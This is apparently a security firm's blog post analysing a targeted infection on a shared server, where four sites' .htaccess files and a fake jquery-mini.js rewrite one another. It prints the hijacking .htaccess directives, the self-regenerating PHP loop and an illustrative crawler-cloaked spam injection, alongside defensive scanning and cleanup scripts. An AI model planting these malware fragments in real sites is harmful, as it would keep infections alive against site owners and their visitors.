Website Malware – Reality of Cross-Site Contaminations


Sometimes you can’t help but put yourself in the shoes of your clients and skeptics and wonder how many times they roll their eyes at the things you say. Cross-site contamination is one of those things.

We first started writing about it back in March of 2012, in a little post that got a lot of attention, "A Little Tale About Website Cross Contamination". In that case, we talked about how the attack vector was a neighboring site that had since been neglected; it was housing the payload generator that kept infecting the live sites. All in all, it was a sad and depressing story.

This case is unique in that it falls into what we would categorize as a targeted attack. That's right, the complete opposite of the opportunistic attacks we tell most readers they fall victim to. I'll caveat that we don't know for sure, but after reading this, we'll let you be the judge.

/* It’s nothing personal, it’s just business */

The Scenario

As in most cases, a client came through our virtual doors a bit perplexed and flustered. They were suffering a continuous infection problem: no matter what they did, the same four sites kept getting infected. The environment was riddled with other sites, which further complicated the case, especially if you know how we're configured. It also so happened that every time we cleaned one site, within minutes it'd come right back, almost as if it were laughing at us. Do you realize how annoying that is?

Often, a scenario like this means there is another payload doing the generating, something we're missing. We have even seen it tied into the system's cron jobs and run at set intervals, making it an even more excruciating problem to debug without root access to the server. Needless to say, none of that was the problem here. We were staring at the problem the entire time.

This is what it was doing at a high level:

[Image: Sucuri - Cross-Site Contamination, high-level diagram]

Of the various other sites on the server, it picked four and became a self-licking ice cream cone, for lack of a better term. What we quickly realized was that you couldn't just remove one; you had to remove all four at the same exact time. The generation cycle was so fast that by the time we cleared one, the others would be back within seconds.

The Details

So how was it doing this? We dug a little deeper into the payload to better understand, and this is what we found.

The crux of the payload had two parts:

  1. .htaccess
  2. a JavaScript file

The .htaccess was used to get the payload loading, but the real workhorse was the JavaScript file it pulled in.

This is what the .htaccess contained:

<files ~ ".js$">
SetHandler application/x-httpd-php
php_value auto_append_file /path-to-file/js/jquery-mini.js
php_flag display_errors Off
</files>

If you're not familiar with the directives being used, don't worry, they're pretty straightforward.

The <files ~ ".js$"> block matches a file type – in this case, JavaScript. SetHandler application/x-httpd-php then tells the server to execute those JS files as PHP. php_value auto_append_file /path-to-file/js/jquery-mini.js appends the payload – the jquery-mini.js file itself – to every one of those requests. And just in case the server configuration would otherwise spit out warnings, php_flag display_errors Off turns error display off so that no one notices.
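If you want a quick way to audit your own environment for this kind of abuse, one crude but effective check is to scan every .htaccess under the web root for handler and append directives that have no business being there. This is only a sketch – the web root path and the directive list are assumptions you'd adjust for your own setup:

<?php
// Sketch: flag .htaccess files that remap file types to PHP or append code.
// The web root and the directive list are assumptions - adjust for your setup.
$webroot    = '/var/www';
$suspicious = array('SetHandler', 'AddHandler', 'auto_append_file', 'auto_prepend_file');

$files = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($webroot, FilesystemIterator::SKIP_DOTS)
);

foreach ($files as $file) {
    if ($file->getFilename() !== '.htaccess') continue;
    $contents = file_get_contents($file->getPathname());
    foreach ($suspicious as $directive) {
        if (stripos($contents, $directive) !== false) {
            echo $file->getPathname() . ': contains ' . $directive . "\n";
        }
    }
}

It will throw false positives on some legitimate configurations, but it surfaces exactly the kind of directive this attack relies on.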

This isn’t even the fun part yet. The real fun begins in the JavaScript file. This is what it looked like:

[Image: Sucuri - Cross-Site Contamination, the JavaScript file as found on the server]

The first red flag was the opening PHP tag – <?php. That doesn't belong in a JS file, but if you recall the .htaccess above, it makes sense: the file needs the tag because it's being executed as PHP. Using our free decoder, you're able to quickly break the payload down and see what's going on:

[Image: Sucuri - Cross-Site Contamination, the decoded payload]

I truncated it to two sites or I'd never get the image into the frame. A couple of areas to pay attention to are the first two arrays (we'll decode those 'data' strings right after them):

 array(
      'name'=>'/path-site-1/.htaccess',
      'checksum'=>'4235295951',
      'data'=>'7068705f76616c756.....,
      'jser'=>'/path-site-1/js/jquery-mini.js'
     ),
 array(
      'name'=>'/path-site-2/.htaccess',
      'checksum'=>'3083167236',
      'data'=>'3c66696c6573207e20....,
      'jser'=>'/path-site-2/js/jquery-mini.js'
    ),
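Those 'data' values are nothing exotic – they are simply the hex-encoded contents of the .htaccess files the script wants to (re)write. You can verify that by decoding the visible prefixes above with PHP's hex2bin() (native in PHP 5.4 and later; as we'll see further down, the malware carries its own fallback for older versions):

<?php
// Decoding the visible prefixes of the 'data' fields shown above.
// The full strings are truncated in this post, so only the beginnings decode.
echo hex2bin('3c66696c6573207e20'), "\n"; // prints: <files ~
echo hex2bin('7068705f76616c75'), "\n";   // prints: php_valu (the start of a php_value line)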

The arrays by themselves aren’t doing anything, at least not until you get here:

foreach ($check as $row)
 {
	chmod($row['jser'],0775);
	chmod($row['name'],0660);
	if (crc32(@file_get_contents($row['name']))<>$row['checksum']) echo @file_put_contents($row['name'],hex2bin($row['data']));
	if (crc32(@file_get_contents($___jser['selfname']))<>crc32(@file_get_contents($row['jser']))) @file_put_contents($row['jser'],@file_get_contents($___jser['selfname']));
 }

This is where it does the check. For each entry, it reads the file named in the 'name' option, computes its crc32 hash, and compares it against the 'checksum' value. If they match, the file is left alone; if they don't – because the file was cleaned, changed, or removed – it rewrites the file using the hex-encoded content in the 'data' option. Comparing hashes like this is a very quick and effective way to tell whether anything has changed – just a little tip.
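Before moving on – that hash-comparison tip works just as well on defense. Here's a minimal sketch of using crc32() to baseline a handful of sensitive files and flag changes on the next run; the watched files and the baseline location are assumptions you'd adjust for your own site:

<?php
// Minimal defensive sketch: baseline sensitive files with crc32() and flag
// any change on the next run. The watched files and the baseline location
// are assumptions - adjust them to your own site.
$watched  = array('/path-to-site/.htaccess', '/path-to-site/index.php');
$baseline = '/path-to-baseline/checksums.json';

$known = is_file($baseline) ? json_decode(file_get_contents($baseline), true) : array();
if (!is_array($known)) $known = array();

foreach ($watched as $file) {
    $crc = sprintf('%u', crc32((string) @file_get_contents($file)));
    if (isset($known[$file]) && $known[$file] !== $crc) {
        echo "CHANGED: $file\n";
    }
    $known[$file] = $crc;
}

file_put_contents($baseline, json_encode($known));

Run something like that from cron and you'll know within minutes when a payload rewrites one of your files.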

The loop does the same kind of check for the file in 'jser', except there the comparison is against the running script itself ($___jser['selfname']); if the copy on the other site differs, the script simply writes itself over it. That's your one giant, self-licking ice cream cone. What was really interesting is that the paths were actually hard-coded in the files here:

 'name'=>'/path-site-1/.htaccess',
 'jser'=>'/path-site-1/js/jquery-mini.js'

I obviously replaced the path directories, but that hard-coding is what leads us to believe this was a targeted attack – the kind we secretly covet, not because we wish them on anyone, but because they are always fun to analyze.

Now, imagine that same process across all four sites. They each contained the same payload, and the only way to remove it was to delete every copy at the same time. Again, deleting just one meant the others would simply regenerate it.

The Payload

Let's not forget that after all of that, the real intent was to drop a payload into the visitor's browser, with four distinct websites as the delivery vehicles. At the very bottom of the JavaScript file you start to see that intent:

if(!function_exists('hex2bin'))
 {
	function hex2bin($h)
	 {
		if (!is_string($h)) return null;
		$r='';
		for ($a=0;$a<strlen($h);$a+=2) $r.=chr(hexdec($h{$a}.$h{($a+1)}));
		return $r;
	 }
 }

That block makes sure the hex2bin() function exists – it's only native in PHP 5.4 and later – because it's used to unpack the actual payload, which is here:

[Image: Sucuri - Cross-Site Contamination, the hex2bin function in use]

When you go to decode it, this is what you get after the first layer of obfuscation. This one you'll need to do a little legwork on:

[Image: Sucuri - Cross-Site Contamination, after the first layer of decoding]

And after one more layer of decoding you finally get to the intended payload:

[Image: Sucuri - Cross-Site Contamination, the fully decoded payload]

To help you decipher it, this is the part of that image that really matters:

[Image: Sucuri - Cross-Site Contamination, the relevant portion of the payload]

If you're curious what it's doing, you might be interested in my last post about SEP Attacks and Link Farms. It's the same exact thing.
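For those who don't want to click through: that class of payload is about conditional spam injection – spammy links or doorway content served only when the visitor looks like a search engine crawler, so a site owner browsing normally never sees a thing. A rough illustration of the idea (not the code from this sample):

<?php
// Rough illustration of a SEP / link-farm style injection - not the code from
// this sample. The spam is only served to search engine crawlers, so a site
// owner browsing the site normally never sees it.
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';

if (preg_match('/googlebot|bingbot|slurp/i', $ua)) {
    echo '<div style="position:absolute;left:-9999px;">'
       . '<a href="http://spam-domain.example/">spam keyword</a>'
       . '</div>';
}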

Full Circle

In the past we focused on the impacts of cross-site contamination as they pertain to attack vectors, but what we hadn't discussed is how a more sophisticated attack can be wired together, as in the scenario described here.

It was actually ingenious, and very simple to implement. The challenge, however, was that while simple to implement, it was difficult to detect – there were no other components that would have flagged it. To the average user, cleaning this up would have been an exhausting process. The fastest way to find the different payloads was to reverse engineer them until you got to the first layer, which very clearly outlined the paths and files. You'd then have to remove each one at the same time, which is best done from the command line interface, via a tool like NCFTP or a shell.
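If you don't have shell access but can run a script on the server, the "remove everything at the same time" step can also be done in a single pass from the PHP command line, which leaves no window for a surviving copy to rebuild the rest. A minimal sketch – the paths are placeholders for the ones you recover from the decoded payload:

<?php
// One-pass cleanup sketch: remove every piece of the infection together so no
// surviving copy can put the others back. Paths are placeholders - use the ones
// recovered from the decoded payload. The .htaccess shown earlier contained only
// the injected directives; if yours mixes in legitimate rules, restore a clean
// copy instead of deleting.
$targets = array(
    '/path-site-1/.htaccess',
    '/path-site-1/js/jquery-mini.js',
    '/path-site-2/.htaccess',
    '/path-site-2/js/jquery-mini.js',
    // ...and so on for the remaining sites
);

foreach ($targets as $file) {
    if (is_file($file) && @unlink($file)) {
        echo "removed: $file\n";
    } else {
        echo "missing or FAILED: $file\n";
    }
}

Whichever route you take, the point stands: remove every piece in one motion, or the payload will put itself right back.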
